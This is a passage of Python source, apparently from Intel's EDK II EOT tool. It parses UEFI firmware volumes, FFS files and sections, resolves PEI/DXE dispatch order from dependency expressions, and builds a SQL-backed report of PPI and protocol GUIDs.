NewSections = CompressSection._SubImages[4]
for NewSection in NewSections.Sections:
if NewSection.Type == 0x13:
IsFoundDepex = True
CouldBeLoaded, DepexString, FileDepex = self.ParseDepex(NewSection._SubImages[4], 'Protocol')
break
# Not find Depex
if not IsFoundDepex:
CouldBeLoaded = self.CheckArchProtocol()
DepexString = ''
FileDepex = None
# Append New Ffs
if CouldBeLoaded:
IsInstalled = True
NewFfs = self.UnDispatchedFfsDict.pop(FfsID)
NewFfs.Depex = DepexString
if FileDepex is not None:
ScheduleList.insert(FileDepex[1], FfsID, NewFfs, FileDepex[0])
else:
ScheduleList[FfsID] = NewFfs
else:
self.UnDispatchedFfsDict[FfsID].Depex = DepexString
for FfsID in ScheduleList.keys():
NewFfs = ScheduleList.pop(FfsID)
FfsName = 'UnKnown'
self.OrderedFfsDict[FfsID] = NewFfs
self.LoadProtocol(Db, FfsID)
SqlCommand = """select Value2 from Inf
where BelongsToFile = (select BelongsToFile from Inf where Value1 = 'FILE_GUID' and lower(Value2) = lower('%s') and Model = %s)
and Model = %s and Value1='BASE_NAME'""" % (FfsID, 5001, 5001)
RecordSet = Db.TblReport.Exec(SqlCommand)
if RecordSet != []:
FfsName = RecordSet[0][0]
if IsInstalled:
self.DisPatchDxe(Db)
def DisPatchPei(self, Db):
IsInstalled = False
for FfsID in self.UnDispatchedFfsDict.keys():
CouldBeLoaded = True
DepexString = ''
FileDepex = None
Ffs = self.UnDispatchedFfsDict[FfsID]
if Ffs.Type == 0x06 or Ffs.Type == 0x08:
# Get Depex
for Section in Ffs.Sections.values():
if Section.Type == 0x1B:
CouldBeLoaded, DepexString, FileDepex = self.ParseDepex(Section._SubImages[4], 'Ppi')
break
if Section.Type == 0x01:
CompressSections = Section._SubImages[4]
for CompressSection in CompressSections.Sections:
if CompressSection.Type == 0x1B:
CouldBeLoaded, DepexString, FileDepex = self.ParseDepex(CompressSection._SubImages[4], 'Ppi')
break
if CompressSection.Type == 0x02:
NewSections = CompressSection._SubImages[4]
for NewSection in NewSections.Sections:
if NewSection.Type == 0x1B:
CouldBeLoaded, DepexString, FileDepex = self.ParseDepex(NewSection._SubImages[4], 'Ppi')
break
# Append New Ffs
if CouldBeLoaded:
IsInstalled = True
NewFfs = self.UnDispatchedFfsDict.pop(FfsID)
NewFfs.Depex = DepexString
self.OrderedFfsDict[FfsID] = NewFfs
self.LoadPpi(Db, FfsID)
else:
self.UnDispatchedFfsDict[FfsID].Depex = DepexString
if IsInstalled:
self.DisPatchPei(Db)
def __str__(self):
global gIndention
gIndention += 4
FvInfo = '\n' + ' ' * gIndention
FvInfo += "[FV:%s] file_system=%s size=%x checksum=%s\n" % (self.Name, self.FileSystemGuid, self.Size, self.Checksum)
FfsInfo = "\n".join([str(self.FfsDict[FfsId]) for FfsId in self.FfsDict])
gIndention -= 4
return FvInfo + FfsInfo
def _Unpack(self):
Size = self._LENGTH_.unpack_from(self._BUF_, self._OFF_)[0]
self.empty()
self.extend(self._BUF_[self._OFF_:self._OFF_ + Size])
# traverse the FFS
EndOfFv = Size
FfsStartAddress = self.HeaderSize
LastFfsObj = None
while FfsStartAddress < EndOfFv:
FfsObj = Ffs()
FfsObj.frombuffer(self, FfsStartAddress)
FfsId = repr(FfsObj)
if ((self.Attributes & 0x00000800) != 0 and len(FfsObj) == 0xFFFFFF) \
or ((self.Attributes & 0x00000800) == 0 and len(FfsObj) == 0):
if LastFfsObj is not None:
LastFfsObj.FreeSpace = EndOfFv - LastFfsObj._OFF_ - len(LastFfsObj)
else:
if FfsId in self.FfsDict:
EdkLogger.error("FV", 0, "Duplicate GUID in FFS",
ExtraData="\t%s @ %s\n\t%s @ %s" \
% (FfsObj.Guid, FfsObj.Offset,
self.FfsDict[FfsId].Guid, self.FfsDict[FfsId].Offset))
self.FfsDict[FfsId] = FfsObj
if LastFfsObj is not None:
LastFfsObj.FreeSpace = FfsStartAddress - LastFfsObj._OFF_ - len(LastFfsObj)
FfsStartAddress += len(FfsObj)
#
# align to next 8-byte aligned address: A = (A + 8 - 1) & (~(8 - 1))
# The next FFS must be at the latest next 8-byte aligned address
#
FfsStartAddress = (FfsStartAddress + 7) & (~7)
LastFfsObj = FfsObj
def _GetAttributes(self):
return self.GetField(self._ATTR_, 0)[0]
def _GetSize(self):
return self.GetField(self._LENGTH_, 0)[0]
def _GetChecksum(self):
return self.GetField(self._CHECKSUM_, 0)[0]
def _GetHeaderLength(self):
return self.GetField(self._HLEN_, 0)[0]
def _GetFileSystemGuid(self):
return gGuidStringFormat % self.GetField(self._GUID_, 0)
Attributes = property(_GetAttributes)
Size = property(_GetSize)
Checksum = property(_GetChecksum)
HeaderSize = property(_GetHeaderLength)
FileSystemGuid = property(_GetFileSystemGuid)
## GuidDefinedImage() class
#
# A class for GUID Defined Image
#
class GuidDefinedImage(Image):
_HEADER_ = struct.Struct("1I2H8B 1H 1H")
_HEADER_SIZE_ = _HEADER_.size
_GUID_ = struct.Struct("1I2H8B")
_DATA_OFFSET_ = struct.Struct("16x 1H")
_ATTR_ = struct.Struct("18x 1H")
CRC32_GUID = "FC1BCDB0-7D31-49AA-936A-A4600D9DD083"
TIANO_COMPRESS_GUID = 'A31280AD-481E-41B6-95E8-127F4C984779'
LZMA_COMPRESS_GUID = 'EE4E5898-3914-4259-9D6E-DC7BD79403CF'
def __init__(self, SectionDefinitionGuid=None, DataOffset=None, Attributes=None, Data=None):
Image.__init__(self)
if SectionDefinitionGuid is not None:
self.SectionDefinitionGuid = SectionDefinitionGuid
if DataOffset is not None:
self.DataOffset = DataOffset
if Attributes is not None:
self.Attributes = Attributes
if Data is not None:
self.Data = Data
def __str__(self):
S = "guid=%s" % (gGuidStringFormat % self.SectionDefinitionGuid)
for Sec in self.Sections:
S += "\n" + str(Sec)
return S
def _Unpack(self):
# keep header in this Image object
self.empty()
self.extend(self._BUF_[self._OFF_ : self._OFF_ + self._LEN_])
return len(self)
def _SetAttribute(self, Attribute):
self.SetField(self._ATTR_, 0, Attribute)
def _GetAttribute(self):
return self.GetField(self._ATTR_)[0]
def _SetGuid(self, Guid):
self.SetField(self._GUID_, 0, Guid)
def _GetGuid(self):
return self.GetField(self._GUID_)
def _SetDataOffset(self, Offset):
self.SetField(self._DATA_OFFSET_, 0, Offset)
def _GetDataOffset(self):
return self.GetField(self._DATA_OFFSET_)[0]
def _GetSections(self):
SectionList = []
Guid = gGuidStringFormat % self.SectionDefinitionGuid
if Guid == self.CRC32_GUID:
# skip the CRC32 value, we don't do CRC32 verification here
Offset = self.DataOffset - 4
while Offset < len(self):
Sec = Section()
try:
Sec.frombuffer(self, Offset)
Offset += Sec.Size
# the section is aligned to 4-byte boundary
Offset = (Offset + 3) & (~3)
except:
break
SectionList.append(Sec)
elif Guid == self.TIANO_COMPRESS_GUID:
try:
# skip the header
Offset = self.DataOffset - 4
TmpData = DeCompress('Framework', self[self.Offset:])
DecData = array('B')
DecData.fromstring(TmpData)
Offset = 0
while Offset < len(DecData):
Sec = Section()
try:
Sec.frombuffer(DecData, Offset)
Offset += Sec.Size
# the section is aligned to 4-byte boundary
Offset = (Offset + 3) & (~3)
except:
break
SectionList.append(Sec)
except:
pass
elif Guid == self.LZMA_COMPRESS_GUID:
try:
# skip the header
Offset = self.DataOffset - 4
TmpData = DeCompress('Lzma', self[self.Offset:])
DecData = array('B')
DecData.fromstring(TmpData)
Offset = 0
while Offset < len(DecData):
Sec = Section()
try:
Sec.frombuffer(DecData, Offset)
Offset += Sec.Size
# the section is aligned to 4-byte boundary
Offset = (Offset + 3) & (~3)
except:
break
SectionList.append(Sec)
except:
pass
return SectionList
Attributes = property(_GetAttribute, _SetAttribute)
SectionDefinitionGuid = property(_GetGuid, _SetGuid)
DataOffset = property(_GetDataOffset, _SetDataOffset)
Sections = property(_GetSections)
## Section() class
#
# A class for Section
#
class Section(Image):
_TypeName = {
0x00 : "<unknown>",
0x01 : "COMPRESSION",
0x02 : "GUID_DEFINED",
0x10 : "PE32",
0x11 : "PIC",
0x12 : "TE",
0x13 : "DXE_DEPEX",
0x14 : "VERSION",
0x15 : "USER_INTERFACE",
0x16 : "COMPATIBILITY16",
0x17 : "FIRMWARE_VOLUME_IMAGE",
0x18 : "FREEFORM_SUBTYPE_GUID",
0x19 : "RAW",
0x1B : "PEI_DEPEX"
}
_SectionSubImages = {
0x01 : CompressedImage,
0x02 : GuidDefinedImage,
0x17 : FirmwareVolume,
0x13 : Depex,
0x1B : Depex,
0x15 : Ui
}
# Size = 3-byte
# Type = 1-byte
_HEADER_ = struct.Struct("3B 1B")
_HEADER_SIZE_ = _HEADER_.size
# SubTypeGuid
# _FREE_FORM_SUBTYPE_GUID_HEADER_ = struct.Struct("1I2H8B")
_SIZE_ = struct.Struct("3B")
_TYPE_ = struct.Struct("3x 1B")
def __init__(self, Type=None, Size=None):
Image.__init__(self)
self._Alignment = 1
if Type is not None:
self.Type = Type
if Size is not None:
self.Size = Size
def __str__(self):
global gIndention
gIndention += 4
SectionInfo = ' ' * gIndention
if self.Type in self._TypeName:
SectionInfo += "[SECTION:%s] offset=%x size=%x" % (self._TypeName[self.Type], self._OFF_, self.Size)
else:
SectionInfo += "[SECTION:%x<unknown>] offset=%x size=%x " % (self.Type, self._OFF_, self.Size)
for Offset in self._SubImages.keys():
SectionInfo += ", " + str(self._SubImages[Offset])
gIndention -= 4
return SectionInfo
def _Unpack(self):
self.empty()
Type, = self._TYPE_.unpack_from(self._BUF_, self._OFF_)
Size1, Size2, Size3 = self._SIZE_.unpack_from(self._BUF_, self._OFF_)
Size = Size1 + (Size2 << 8) + (Size3 << 16)
if Type not in self._SectionSubImages:
# no need to extract sub-image, keep all in this Image object
self.extend(self._BUF_[self._OFF_ : self._OFF_ + Size])
else:
# keep header in this Image object
self.extend(self._BUF_[self._OFF_ : self._OFF_ + self._HEADER_SIZE_])
#
# use new Image object to represent payload, which may be another kind
# of image such as PE32
#
PayloadOffset = self._HEADER_SIZE_
PayloadLen = self.Size - self._HEADER_SIZE_
Payload = self._SectionSubImages[self.Type]()
Payload.frombuffer(self._BUF_, self._OFF_ + self._HEADER_SIZE_, PayloadLen)
self._SubImages[PayloadOffset] = Payload
return Size
def _SetSize(self, Size):
Size1 = Size & 0xFF
Size2 = (Size & 0xFF00) >> 8
Size3 = (Size & 0xFF0000) >> 16
self.SetField(self._SIZE_, 0, Size1, Size2, Size3)
def _GetSize(self):
Size1, Size2, Size3 = self.GetField(self._SIZE_)
return Size1 + (Size2 << 8) + (Size3 << 16)
def _SetType(self, Type):
self.SetField(self._TYPE_, 0, Type)
def _GetType(self):
return self.GetField(self._TYPE_)[0]
def _GetAlignment(self):
return self._Alignment
def _SetAlignment(self, Alignment):
self._Alignment = Alignment
AlignmentMask = Alignment - 1
# section alignment is actually for payload, so we need to add header size
PayloadOffset = self._OFF_ + self._HEADER_SIZE_
if (PayloadOffset & (~AlignmentMask)) == 0:
return
NewOffset = (PayloadOffset + AlignmentMask) & (~AlignmentMask)
while (NewOffset - PayloadOffset) < self._HEADER_SIZE_:
NewOffset += self._Alignment
def tofile(self, f):
self.Size = len(self)
Image.tofile(self, f)
for Offset in self._SubImages:
self._SubImages[Offset].tofile(f)
Type = property(_GetType, _SetType)
Size = property(_GetSize, _SetSize)
Alignment = property(_GetAlignment, _SetAlignment)
## Ffs() class
#
# A class for Ffs Section
#
class Ffs(Image):
_FfsFormat = "24B%(payload_size)sB"
# skip IntegrityCheck
_HEADER_ = struct.Struct("1I2H8B 2x 1B 1B 3B 1B")
_HEADER_SIZE_ = _HEADER_.size
_NAME_ = struct.Struct("1I2H8B")
_INT_CHECK_ = struct.Struct("16x 1H")
_TYPE_ = struct.Struct("18x 1B")
_ATTR_ = struct.Struct("19x 1B")
_SIZE_ = struct.Struct("20x 3B")
_STATE_ = struct.Struct("23x 1B")
VTF_GUID = "1BA0062E-C779-4582-8566-336AE8F78F09"
FFS_ATTRIB_FIXED = 0x04
FFS_ATTRIB_DATA_ALIGNMENT = 0x38
FFS_ATTRIB_CHECKSUM = 0x40
_TypeName = {
0x00 : "<unknown>",
0x01 : "RAW",
0x02 : "FREEFORM",
0x03 : "SECURITY_CORE",
0x04 : "PEI_CORE",
0x05 : "DXE_CORE",
0x06 : "PEIM",
0x07 : "DRIVER",
0x08 : "COMBINED_PEIM_DRIVER",
0x09 : "APPLICATION",
0x0A : "SMM",
0x0B : "FIRMWARE_VOLUME_IMAGE",
0x0C : "COMBINED_SMM_DXE",
0x0D : "SMM_CORE",
0x0E : "MM_STANDALONE",
0x0F : "MM_CORE_STANDALONE",
0xc0 : "OEM_MIN",
0xdf : "OEM_MAX",
0xe0 : "DEBUG_MIN",
0xef : "DEBUG_MAX",
0xf0 : "FFS_MIN",
0xff : "FFS_MAX",
0xf0 : "FFS_PAD",
}
def __init__(self):
Image.__init__(self)
self.FreeSpace = 0
self.Sections = sdict()
self.Depex = ''
self.__ID__ = None
def __str__(self):
global gIndention
gIndention += 4
Indention = ' ' * gIndention
FfsInfo = Indention
FfsInfo += "[FFS:%s] offset=%x size=%x guid=%s free_space=%x alignment=%s\n" % \
(Ffs._TypeName[self.Type], self._OFF_, self.Size, self.Guid, self.FreeSpace, self.Alignment)
SectionInfo = '\n'.join([str(self.Sections[Offset]) for Offset in self.Sections.keys()])
gIndention -= 4
return FfsInfo + SectionInfo + "\n"
def __len__(self):
return self.Size
def __repr__(self):
return self.__ID__
def _Unpack(self):
Size1, Size2, Size3 = self._SIZE_.unpack_from(self._BUF_, self._OFF_)
Size = Size1 + (Size2 << 8) + (Size3 << 16)
self.empty()
self.extend(self._BUF_[self._OFF_ : self._OFF_ + Size])
# Pad FFS may use the same GUID. We need to avoid it.
if self.Type == 0xf0:
self.__ID__ = str(uuid.uuid1()).upper()
else:
self.__ID__ = self.Guid
# Traverse the SECTION. RAW and PAD do not have sections
if self.Type not in [0xf0, 0x01] and Size > 0 and Size < 0xFFFFFF:
EndOfFfs = Size
SectionStartAddress = self._HEADER_SIZE_
while SectionStartAddress < EndOfFfs:
SectionObj = Section()
SectionObj.frombuffer(self, SectionStartAddress)
#f = open(repr(SectionObj), 'wb')
#SectionObj.Size = 0
#SectionObj.tofile(f)
#f.close()
self.Sections[SectionStartAddress] = SectionObj
SectionStartAddress += len(SectionObj)
SectionStartAddress = (SectionStartAddress + 3) & (~3)
def Pack(self):
pass
def SetFreeSpace(self, Size):
self.FreeSpace = Size
def _GetGuid(self):
return gGuidStringFormat % self.Name
def _SetName(self, Value):
# Guid1, Guid2, Guid3, Guid4, Guid5, Guid6, Guid7, Guid8, Guid9, Guid10, Guid11
self.SetField(self._NAME_, 0, Value)
def _GetName(self):
# Guid1, Guid2, Guid3, Guid4, Guid5, Guid6, Guid7, Guid8, Guid9, Guid10, Guid11
return self.GetField(self._NAME_)
def _SetSize(self, Size):
Size1 = Size & 0xFF
Size2 = (Size & 0xFF00) >> 8
Size3 = (Size & 0xFF0000) >> 16
self.SetField(self._SIZE_, 0, Size1, Size2, Size3)
def _GetSize(self):
Size1, Size2, Size3 = self.GetField(self._SIZE_)
return Size1 + (Size2 << 8) + (Size3 << 16)
def _SetType(self, Type):
self.SetField(self._TYPE_, 0, Type)
def _GetType(self):
return self.GetField(self._TYPE_)[0]
def _SetAttributes(self, Value):
self.SetField(self._ATTR_, 0, Value)
def _GetAttributes(self):
return self.GetField(self._ATTR_)[0]
def _GetFixed(self):
if (self.Attributes & self.FFS_ATTRIB_FIXED) != 0:
return True
return False
def _GetCheckSum(self):
if (self.Attributes & self.FFS_ATTRIB_CHECKSUM) != 0:
return True
return False
def _GetAlignment(self):
return (self.Attributes & self.FFS_ATTRIB_DATA_ALIGNMENT) >> 3
def _SetState(self, Value):
self.SetField(self._STATE_, 0, Value)
def _GetState(self):
return self.GetField(self._STATE_)[0]
Name = property(_GetName, _SetName)
Guid = property(_GetGuid)
Type = property(_GetType, _SetType)
Size = property(_GetSize, _SetSize)
Attributes = property(_GetAttributes, _SetAttributes)
Fixed = property(_GetFixed)
Checksum = property(_GetCheckSum)
Alignment = property(_GetAlignment)
State = property(_GetState, _SetState)
## MultipleFv() class
#
# A class for Multiple FV
#
class MultipleFv(FirmwareVolume):
def __init__(self, FvList):
FirmwareVolume.__init__(self)
self.BasicInfo = []
for FvPath in FvList:
Fd = None
FvName = os.path.splitext(os.path.split(FvPath)[1])[0]
if FvPath.strip():
Fd = open(FvPath, 'rb')
Buf = array('B')
try:
Buf.fromfile(Fd, os.path.getsize(FvPath))
except EOFError:
pass
Fv = FirmwareVolume(FvName)
Fv.frombuffer(Buf, 0, len(Buf))
self.BasicInfo.append([Fv.Name, Fv.FileSystemGuid, Fv.Size])
self.FfsDict.append(Fv.FfsDict)
## Class Eot
#
# This class is used to define Eot main entrance
#
# @param object: Inherited from object class
#
class Eot(object):
## The constructor
#
# @param self: The object pointer
#
def __init__(self, CommandLineOption=True, IsInit=True, SourceFileList=None, \
IncludeDirList=None, DecFileList=None, GuidList=None, LogFile=None,
FvFileList="", MapFileList="", Report='Report.html', Dispatch=None):
# Version and Copyright
self.VersionNumber = ("0.02" + " " + gBUILD_VERSION)
self.Version = "%prog Version " + self.VersionNumber
self.Copyright = "Copyright (c) 2008 - 2018, Intel Corporation All rights reserved."
self.Report = Report
self.IsInit = IsInit
self.SourceFileList = SourceFileList
self.IncludeDirList = IncludeDirList
self.DecFileList = DecFileList
self.GuidList = GuidList
self.LogFile = LogFile
self.FvFileList = FvFileList
self.MapFileList = MapFileList
self.Dispatch = Dispatch
# Check workspace environment
if "EFI_SOURCE" not in os.environ:
if "EDK_SOURCE" not in os.environ:
pass
else:
EotGlobalData.gEDK_SOURCE = os.path.normpath(os.getenv("EDK_SOURCE"))
else:
EotGlobalData.gEFI_SOURCE = os.path.normpath(os.getenv("EFI_SOURCE"))
EotGlobalData.gEDK_SOURCE = os.path.join(EotGlobalData.gEFI_SOURCE, 'Edk')
if "WORKSPACE" not in os.environ:
EdkLogger.error("EOT", BuildToolError.ATTRIBUTE_NOT_AVAILABLE, "Environment variable not found",
ExtraData="WORKSPACE")
else:
EotGlobalData.gWORKSPACE = os.path.normpath(os.getenv("WORKSPACE"))
EotGlobalData.gMACRO['WORKSPACE'] = EotGlobalData.gWORKSPACE
EotGlobalData.gMACRO['EFI_SOURCE'] = EotGlobalData.gEFI_SOURCE
EotGlobalData.gMACRO['EDK_SOURCE'] = EotGlobalData.gEDK_SOURCE
# Parse the options and args
if CommandLineOption:
self.ParseOption()
if self.FvFileList:
for FvFile in GetSplitValueList(self.FvFileList, ' '):
FvFile = os.path.normpath(FvFile)
if not os.path.isfile(FvFile):
EdkLogger.error("Eot", EdkLogger.EOT_ERROR, "Can not find file %s " % FvFile)
EotGlobalData.gFV_FILE.append(FvFile)
else:
EdkLogger.error("Eot", EdkLogger.EOT_ERROR, "The fv file list of target platform was not specified")
if self.MapFileList:
for MapFile in GetSplitValueList(self.MapFileList, ' '):
MapFile = os.path.normpath(MapFile)
if not os.path.isfile(MapFile):
EdkLogger.error("Eot", EdkLogger.EOT_ERROR, "Can not find file %s " % MapFile)
EotGlobalData.gMAP_FILE.append(MapFile)
# Generate source file list
self.GenerateSourceFileList(self.SourceFileList, self.IncludeDirList)
# Generate guid list of dec file list
self.ParseDecFile(self.DecFileList)
# Generate guid list from GUID list file
self.ParseGuidList(self.GuidList)
# Init Eot database
EotGlobalData.gDb = Database.Database(Database.DATABASE_PATH)
EotGlobalData.gDb.InitDatabase(self.IsInit)
# Build ECC database
self.BuildDatabase()
# Parse Ppi/Protocol
self.ParseExecutionOrder()
# Merge Identifier tables
self.GenerateQueryTable()
# Generate report database
self.GenerateReportDatabase()
# Load Fv Info
self.LoadFvInfo()
# Load Map Info
self.LoadMapInfo()
# Generate Report
self.GenerateReport()
# Convert log file
self.ConvertLogFile(self.LogFile)
# DONE
EdkLogger.quiet("EOT FINISHED!")
# Close Database
EotGlobalData.gDb.Close()
## ParseDecFile() method
#
# parse DEC file and get all GUID names with GUID values as {GuidName : GuidValue}
# The Dict is stored in EotGlobalData.gGuidDict
#
# @param self: The object pointer
# @param DecFileList: A list of all DEC files
#
def ParseDecFile(self, DecFileList):
if DecFileList:
path = os.path.normpath(DecFileList)
lfr = open(path, 'rb')
for line in lfr:
path = os.path.normpath(os.path.join(EotGlobalData.gWORKSPACE, line.strip()))
if os.path.exists(path):
dfr = open(path, 'rb')
for line in dfr:
line = CleanString(line)
list = line.split('=')
if len(list) == 2:
EotGlobalData.gGuidDict[list[0].strip()] = GuidStructureStringToGuidString(list[1].strip())
## ParseGuidList() method
#
# Parse Guid list and get all GUID names with GUID values as {GuidName : GuidValue}
# The Dict is stored in EotGlobalData.gGuidDict
#
# @param self: The object pointer
# @param GuidList: A list of all GUID and its value
#
def ParseGuidList(self, GuidList):
Path = os.path.join(EotGlobalData.gWORKSPACE, GuidList)
if os.path.isfile(Path):
for Line in open(Path):
if Line.strip():
(GuidName, GuidValue) = Line.split()
EotGlobalData.gGuidDict[GuidName] = GuidValue
## ConvertLogFile() method
#
# Parse a real running log file to get real dispatch order
# The result is saved to old file name + '.new'
#
# @param self: The object pointer
# @param LogFile: A real running log file name
#
def ConvertLogFile(self, LogFile):
newline = []
lfr = None
lfw = None
if LogFile:
lfr = open(LogFile, 'rb')
lfw = open(LogFile + '.new', 'wb')
for line in lfr:
line = line.strip()
line = line.replace('.efi', '')
index = line.find("Loading PEIM at ")
if index > -1:
newline.append(line[index + 55 : ])
continue
index = line.find("Loading driver at ")
if index > -1:
newline.append(line[index + 57 : ])
continue
for line in newline:
lfw.write(line + '\r\n')
if lfr:
lfr.close()
if lfw:
lfw.close()
## GenerateSourceFileList() method
#
# Generate a list of all source files
# 1. Search the file list one by one
# 2. Store inf file name with source file names under it like
# { INF file name: [source file1, source file2, ...]}
# 3. Search the include list to find all .h files
# 4. Store source file list to EotGlobalData.gSOURCE_FILES
# 5. Store INF file list to EotGlobalData.gINF_FILES
#
# @param self: The object pointer
# @param SourceFileList: A list of all source files
# @param IncludeFileList: A list of all include files
#
def GenerateSourceFileList(self, SourceFileList, IncludeFileList):
EdkLogger.quiet("Generating source files list ... ")
mSourceFileList = []
mInfFileList = []
mDecFileList = []
mFileList = {}
mCurrentInfFile = ''
mCurrentSourceFileList = []
if SourceFileList:
sfl = open(SourceFileList, 'r')
for line in sfl:
line = os.path.normpath(os.path.join(EotGlobalData.gWORKSPACE, line.strip()))
if line[-2:].upper() == '.C' or line[-2:].upper() == '.H':
if line not in mCurrentSourceFileList:
mCurrentSourceFileList.append(line)
mSourceFileList.append(line)
EotGlobalData.gOP_SOURCE_FILES.write('%s\n' % line)
if line[-4:].upper() == '.INF':
if mCurrentInfFile != '':
mFileList[mCurrentInfFile] = mCurrentSourceFileList
mCurrentSourceFileList = []
mCurrentInfFile = os.path.normpath(os.path.join(EotGlobalData.gWORKSPACE, line))
EotGlobalData.gOP_INF.write('%s\n' % mCurrentInfFile)
if mCurrentInfFile not in mFileList:
mFileList[mCurrentInfFile] = mCurrentSourceFileList
# Get all include files from packages
if IncludeFileList:
ifl = open(IncludeFileList, 'rb')
for line in ifl:
if not line.strip():
continue
newline = os.path.normpath(os.path.join(EotGlobalData.gWORKSPACE, line.strip()))
for Root, Dirs, Files in os.walk(str(newline)):
for File in Files:
FullPath = os.path.normpath(os.path.join(Root, File))
if FullPath not in mSourceFileList and File[-2:].upper() == '.H':
mSourceFileList.append(FullPath)
EotGlobalData.gOP_SOURCE_FILES.write('%s\n' % FullPath)
if FullPath not in mDecFileList and File.upper().find('.DEC') > -1:
mDecFileList.append(FullPath)
EotGlobalData.gSOURCE_FILES = mSourceFileList
EotGlobalData.gOP_SOURCE_FILES.close()
EotGlobalData.gINF_FILES = mFileList
EotGlobalData.gOP_INF.close()
## GenerateReport() method
#
# Generate final HTML report
#
# @param self: The object pointer
#
def GenerateReport(self):
EdkLogger.quiet("Generating report file ... ")
Rep = Report(self.Report, EotGlobalData.gFV, self.Dispatch)
Rep.GenerateReport()
## LoadMapInfo() method
#
# Load map files and parse them
#
# @param self: The object pointer
#
def LoadMapInfo(self):
if EotGlobalData.gMAP_FILE != []:
EdkLogger.quiet("Parsing Map file ... ")
EotGlobalData.gMap = ParseMapFile(EotGlobalData.gMAP_FILE)
## LoadFvInfo() method
#
# Load FV binary files and parse them
#
# @param self: The object pointer
#
def LoadFvInfo(self):
EdkLogger.quiet("Parsing FV file ... ")
EotGlobalData.gFV = MultipleFv(EotGlobalData.gFV_FILE)
EotGlobalData.gFV.Dispatch(EotGlobalData.gDb)
for Protocol in EotGlobalData.gProtocolList:
EotGlobalData.gOP_UN_MATCHED_IN_LIBRARY_CALLING.write('%s\n' %Protocol)
## GenerateReportDatabase() method
#
# Generate data for the information needed by report
# 1. Update name, macro and value of all found PPI/PROTOCOL GUID
# 2. Install hard coded PPI/PROTOCOL
#
# @param self: The object pointer
#
def GenerateReportDatabase(self):
EdkLogger.quiet("Generating the cross-reference table of GUID for Ppi/Protocol ... ")
# Update Protocol/Ppi Guid
SqlCommand = """select DISTINCT GuidName from Report"""
RecordSet = EotGlobalData.gDb.TblReport.Exec(SqlCommand)
for Record in RecordSet:
GuidName = Record[0]
GuidMacro = ''
GuidMacro2 = ''
GuidValue = ''
# Find guid value defined in Dec file
if GuidName in EotGlobalData.gGuidDict:
GuidValue = EotGlobalData.gGuidDict[GuidName]
SqlCommand = """update Report set GuidMacro = '%s', GuidValue = '%s' where GuidName = '%s'""" %(GuidMacro, GuidValue, GuidName)
EotGlobalData.gDb.TblReport.Exec(SqlCommand)
continue
# Search defined Macros for guid name
SqlCommand ="""select DISTINCT Value, Modifier from Query where Name like '%s'""" % GuidName
GuidMacroSet = EotGlobalData.gDb.TblReport.Exec(SqlCommand)
# Ignore NULL result
if not GuidMacroSet:
continue
GuidMacro = GuidMacroSet[0][0].strip()
if not GuidMacro:
continue
# Find Guid value of Guid Macro
SqlCommand ="""select DISTINCT Value from Query2 where Value like '%%%s%%' and Model = %s""" % (GuidMacro, MODEL_IDENTIFIER_MACRO_DEFINE)
GuidValueSet = EotGlobalData.gDb.TblReport.Exec(SqlCommand)
if GuidValueSet != []:
GuidValue = GuidValueSet[0][0]
GuidValue = GuidValue[GuidValue.find(GuidMacro) + len(GuidMacro) :]
GuidValue = GuidValue.lower().replace('\\', '').replace('\r', '').replace('\n', '').replace('l', '').strip()
GuidValue = GuidStructureStringToGuidString(GuidValue)
SqlCommand = """update Report set GuidMacro = '%s', GuidValue = '%s' where GuidName = '%s'""" %(GuidMacro, GuidValue, GuidName)
EotGlobalData.gDb.TblReport.Exec(SqlCommand)
continue
# Update Hard Coded Ppi/Protocol
SqlCommand = """select DISTINCT GuidValue, ItemType from Report where ModuleID = -2 and ItemMode = 'Produced'"""
RecordSet = EotGlobalData.gDb.TblReport.Exec(SqlCommand)
for Record in RecordSet:
if Record[1] == 'Ppi':
EotGlobalData.gPpiList[Record[0].lower()] = -2
if Record[1] == 'Protocol':
EotGlobalData.gProtocolList[Record[0].lower()] = -2
## GenerateQueryTable() method
#
# Generate two tables improve query performance
#
# @param self: The object pointer
#
def GenerateQueryTable(self):
EdkLogger.quiet("Generating temp query table for analysis ... ")
for Identifier in EotGlobalData.gIdentifierTableList:
SqlCommand = """insert into Query (Name, Modifier, Value, Model)
select Name, Modifier, Value, Model from %s where (Model = %s or Model = %s)""" \
% (Identifier[0], MODEL_IDENTIFIER_VARIABLE, MODEL_IDENTIFIER_ASSIGNMENT_EXPRESSION)
EotGlobalData.gDb.TblReport.Exec(SqlCommand)
SqlCommand = """insert into Query2 (Name, Modifier, Value, Model)
select Name, Modifier, Value, Model from %s where Model = %s""" \
% (Identifier[0], MODEL_IDENTIFIER_MACRO_DEFINE)
EotGlobalData.gDb.TblReport.Exec(SqlCommand)
## ParseExecutionOrder() method
#
# Get final execution order
# 1. Search all PPI
# 2. Search all PROTOCOL
#
# @param self: The object pointer
#
def ParseExecutionOrder(self):
EdkLogger.quiet("Searching Ppi/Protocol ... ")
for Identifier in EotGlobalData.gIdentifierTableList:
ModuleID, ModuleName, ModuleGuid, SourceFileID, SourceFileFullPath, ItemName, ItemType, ItemMode, GuidName, GuidMacro, GuidValue, BelongsToFunction, Enabled = \
-1, '', '', -1, '', '', '', '', '', '', '', '', 0
SourceFileID = Identifier[0].replace('Identifier', '')
SourceFileFullPath = Identifier[1]
Identifier = Identifier[0]
# Find Ppis
ItemMode = 'Produced'
SqlCommand = """select Value, Name, BelongsToFile, StartLine, EndLine from %s
where (Name like '%%%s%%' or Name like '%%%s%%' or Name like '%%%s%%') and Model = %s""" \
% (Identifier, '.InstallPpi', '->InstallPpi', 'PeiInstallPpi', MODEL_IDENTIFIER_FUNCTION_CALLING)
SearchPpi(SqlCommand, Identifier, SourceFileID, SourceFileFullPath, ItemMode)
ItemMode = 'Produced'
SqlCommand = """select Value, Name, BelongsToFile, StartLine, EndLine from %s
where (Name like '%%%s%%' or Name like '%%%s%%') and Model = %s""" \
% (Identifier, '.ReInstallPpi', '->ReInstallPpi', MODEL_IDENTIFIER_FUNCTION_CALLING)
SearchPpi(SqlCommand, Identifier, SourceFileID, SourceFileFullPath, ItemMode, 2)
SearchPpiCallFunction(Identifier, SourceFileID, SourceFileFullPath, ItemMode)
ItemMode = 'Consumed'
SqlCommand = """select Value, Name, BelongsToFile, StartLine, EndLine from %s
where (Name like '%%%s%%' or Name like '%%%s%%') and Model = %s""" \
% (Identifier, '.LocatePpi', '->LocatePpi', MODEL_IDENTIFIER_FUNCTION_CALLING)
SearchPpi(SqlCommand, Identifier, SourceFileID, SourceFileFullPath, ItemMode)
SearchFunctionCalling(Identifier, SourceFileID, SourceFileFullPath, 'Ppi', ItemMode)
ItemMode = 'Callback'
